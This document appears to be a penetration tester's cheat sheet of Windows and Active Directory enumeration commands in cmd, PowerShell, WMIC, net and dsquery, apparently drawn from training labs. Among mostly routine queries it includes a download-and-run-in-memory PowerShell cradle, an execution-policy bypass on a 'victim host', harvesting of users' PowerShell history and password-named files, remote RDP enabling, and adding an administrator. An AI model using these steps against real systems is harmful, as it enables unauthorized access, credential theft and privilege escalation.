Information gathering

Host

hostname

System Information

sysinfo - [cmd / powershell]

systeminfo

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

System - [powershell]

[System.Environment]::OSVersion.Version

path- [powershell]

$env:path

windows defender - [cmd]

sc query windefend

sc – service controll Displays the domain name to which the host belongs (ran from CMD-prompt)

set %USERDOMAIN%

Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)

set %logonserver%

User and groups

local

my user

whoami
whoami /priv
whoami /groups

user - [cmd]

net user
net user <user-name>

user - [powershell]

get-localuser
get-localuser -name <user-name> | select *
get-localuser -name <user-name> | select Name,Enabled,LastLogon

group - [cmd]

net localgroup
net localgroup <group-name>

group - [powershell]

get-localGroup | Select *
get-localGroup | ft Name

user that belong to a group - [cmd]

net localgroup <group-name>

user that belong to a grup - [powershell]

Get-LocalGroupMember Administrators | ft Name,PrincipalSource

permissions

.\accesschk.exe -uwdq "C:\Program Files\Unquoted Path Service\"

Cron

scheduled tasks

schtasks /query /fo LIST /v

schtasks /query /fo LIST /v | findstr /v "\Microsoft"

Process

list of processes that are mapped to a specific Windows service

tasklist /SVC

Get-Process

Service

show all services running on the machine [cmd]

sc queryex type=service

show services [cmd]

wmic service
wmic service get name,startname
wmic service get name,pathname

[powershell]

Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName

Get-WmiObject win32_service | select Name, DisplayName, PathName

Get-WmiObject win32_service | select Name, PathName

[powershell]

Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartMode | Where-Object {$_.State -like 'Running'}

Network

Prints out adapter settings for the host.

ifconfig
ipconfig /all

Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.

route print

Active network connections

netstat -n
netstat -r
netstat -ano

Lists all known hosts stored in the arp table.

arp -a

Test connection

Test-NetConnection -ComputerName 127.0.0.1 -Port 80

Firewall

Displays the status of the host's firewall. We can determine if it is active and filtering traffic.

netsh advfirewall show state

firewall - powershell

netsh advfirewall firewall dump
netsh advfirewall firewall show rule name=all
netsh advfirewall show currentprofile
netsh advfirewall show allprofiles

netsh firewall show state
netsh firewall show config

firewall - cmd

sc query windefend

firewall

Get-NetFirewallProfile | Format-Table Name, Enabled

Get-NetFirewallRule | select DisplayName, Enabled, Description

Get-NetFirewallRule -DisplayName THM-Connection | select *

Installed Applications

application - [cmd]

wmic product get name, version, vendor

updates - [cmd]

wmic qfe get Caption, Description, HotFixID, InstalledOn

windows antyvirus

Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct

antimalware

et-MpComputerStatus

windows defender

Get-Service WinDefend

Get-MpThreat

Get-MpComputerStatus | select RealTimeProtectionEnabled

Readable/Writable Files and Directories

accesschk.exe -uws "Everyone" "C:\Program Files"

- -u to suppress errors - -w to search for write access permissions - -s to perform a recursive search

Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

Disks

enumeration all disks

mountvol

wmic logicaldisk get caption,description,providername

Device Drivers and Kernel Modules

Enunerate drivers

driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path

get details

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Binaries That AutoElevate

If this key is enabled HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user can run Windows Installer with elevated privileges.

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Directory permission

get-acl -path "C:\Program Files\Unquoted Path Service\" | Format-Table -wrap
get-acl -path "C:\Program Files\Unquoted Path Service\" | Format-List

List of files

dir
ls
ls -force
Get-ChildItem
gci

Shares

net view \\dc01 /all

net share

Logs and Events

get-eventlog -list

Harnessing PowerShell

Lists available modules loaded for use.

Get-Module

Will print the execution policy settings for each scope on a host.

Get-ExecutionPolicy -List

This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.

Set-ExecutionPolicy Bypass -Scope Process

With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

Return environment values such as key paths, users, computer information, etc.

Get-ChildItem Env: | ft Key,Value

Download a file from the web using PowerShell and call it from memory.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

Am I Alone?

qwinsta

Windows Management Instrumentation (WMI)

Prints the patch level and description of the Hotfixes applied

wmic qfe get Caption,Description,HotFixID,InstalledOn

Displays basic host information to include any attributes within the list

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List

A listing of all processes on host

wmic process list /format:list

Displays information about the Domain and Domain Controllers

wmic ntdomain list /format:list

Displays information about all local accounts and any domain accounts that have logged into the device

wmic useraccount list /format:list

Information about all local groups

wmic group list /format:list

Dumps information about any system accounts that are being used as service accounts.

wmic sysaccount list /format:list

Host Enumeration OS

wmic computersystem LIST full

Anti-Virus

wmic /namespace:\\root\securitycenter2 path antivirusproduct

Peripherals

wmic path Win32_PnPdevice

Installed Updates

wmic qfe list brief

Directory Listing and File Search

wmic DATAFILE where "path='\\Users\\test\\Documents\\'" GET Name,readable,size

wmic DATAFILE where "drive='C:' AND Name like '%password%'" GET Name,readable,size /VALUE

Local User Accounts

wmic USERACCOUNT Get Domain,Name,Sid

Domain Enumeration Domain and DC Info

wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE

Domain User Info

wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='testAccount'" GET

List All Users

wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname

List All Groups

wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname

Members of A Group

wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value

wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="YOURDOMAINHERE"")

List All Computers

wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname

OR

wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname

Execute Remote Command

wmic process call create "cmd.exe /c calc.exe"

Enable Remote Desktop

wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"

OR

wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

Net Commands

Information about password requirements

net accounts

Password and lockout policy

net accounts /domain

Information about domain groups

net group /domain

List of users with domain admin privileges

net group "Domain Admins" /domain

List of PCs connected to the domain

net group "domain computers" /domain

List of PC accounts of domains controllers

net group "Domain Controllers" /domain

User that belongs to the group

net group <domain_group_name> /domain

List of domain groups

net groups /domain

All available groups

net localgroup

List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)

net localgroup administrators /domain

Information about a group (admins)

net localgroup Administrators

Add user to administrators

net localgroup administrators [username] /add

Check current shares

net share

Get information about a user within the domain

net user <ACCOUNT_NAME> /domain

List of all users of the domain

net user /domain

Information about the current user

net user %username%

Mount the share locally

net use x: \computer\share

Get a list of computers

net view

Shares on the domains

net view /all /domain[:domainname]

List shares of a computer

net view \computer /ALL

List of PCs of the domain

net view /domain

Dsquery

Dsquery is a helpful command-line tool that can be utilized to find Active Directory objects.

User Search

dsquery user

Computer Search

dsquery computer

We can use a dsquery wildcard search to view all objects in an OU.

dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

Users With Specific Attributes Set (PASSWD_NOTREQD)

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

Searching for Domain Controllers

dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName

Automated Enumeration

executable

winPEASany.exe
Seatbelt.exe
watson.exe
SharpUp.exe

powerShell

windows-exploit-suggester

windows-exploit-suggester
/opt/windows/windows-exploit-suggester systeminfo.out -i "Elevation of Privilege" -e > exploits.txt

windows-privesc-check2.exe

windows-privesc-check
windows-privesc-check2.exe --dump -G

metasploit

msf> run post/multi/recon/local_exploit_suggester